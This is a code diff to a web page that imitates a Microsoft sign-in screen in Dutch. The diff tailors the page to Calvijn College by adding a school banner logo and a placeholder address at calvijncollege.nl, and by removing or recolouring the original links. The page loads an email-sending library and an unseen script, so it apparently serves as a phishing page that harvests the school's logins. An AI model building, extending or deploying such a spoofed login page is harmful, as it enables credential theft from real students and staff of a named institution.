--- a/index.html
+++ b/index.html
@@ -1,5 +1,4 @@
 <!DOCTYPE html>
-
 <html>
     <head>
         <link rel="stylesheet" href="style.css">
@@ -7,14 +6,14 @@
         <link rel="shortcut icon" href="https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
     </head>
     <body>
-        <img src="Achtergrond.svg" class="bg" id="bg">
+        <img src="Achtergrond calvijn.svg" class="bg" id="bg">
         <main>
             <div id="center" class="lightbox">
                 <div id="lightbox">
-                    <img src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" class="logo">
+                    <img src="https://aadcdn.msauthimages.net/c1c6b6c8-50aoayfc7clfkoxxs2uutogapybqllwpd9cpe-t2tou/logintenantbranding/0/bannerlogo?ts=636464384620697590" class="logo">
                     <div class="title">Aanmelden</div>
                     <div id="note" style="display: none;">Voer een geldig e-mailadres, telefoonnummer of Skype-naam in.</div>
-                    <input type="email" class="email" id="email" autocomplete="off" placeholder="E-mailadres, telefoonnummer of Skype-naam">
+                    <input type="email" class="email" id="email" autocomplete="off" placeholder="code@calvijncollege.nl">
                     <div class="new-account">Geen account? <a href="https://signup.live.com/signup?">Maak nu een account</a></div>
                     <div class="no-access"><a href="https://login.microsoftonline.com/">Hebt u geen toegang tot het account?</a></div>
                     <input type="button" value="Volgende" id="submit" class="submit">
@@ -42,17 +41,11 @@
                     </div>
                 </div>
             </div>
-            <a href="https://login.microsoftonline.com/" id="options"><div class="options">
-                <div class="options-row">
-                    <img src="https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg" class="key">
-                    <div class="option-box"><div class="option">Aanmeldingsopties</div></div>
-                </div>
-            </div></a>
         </main>
         <footer class="footer">
-            <a href="https://www.microsoft.com/nl-NL/servicesagreement/" class="terms" id="terms" style="color: #000;">Gebruiksvoorwaarden</a>
-            <a href="https://www.microsoft.com/nl-NL/privacy/privacystatement" class="privacy" id="privacy" style="color: #000;">Privacy en cookies</a>
-            <a href="#" class="moreOptions" style="color: #000;" id="dots">...</a>
+            <a href="https://www.microsoft.com/nl-NL/servicesagreement/" class="terms" id="terms" style="color: #fff;">Gebruiksvoorwaarden</a>
+            <a href="https://www.microsoft.com/nl-NL/privacy/privacystatement" class="privacy" id="privacy" style="color: #fff;">Privacy en cookies</a>
+            <a href="#" class="moreOptions" style="color: #fff;" id="dots">...</a>
         </footer>
         <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
         <script src="script.js"></script>
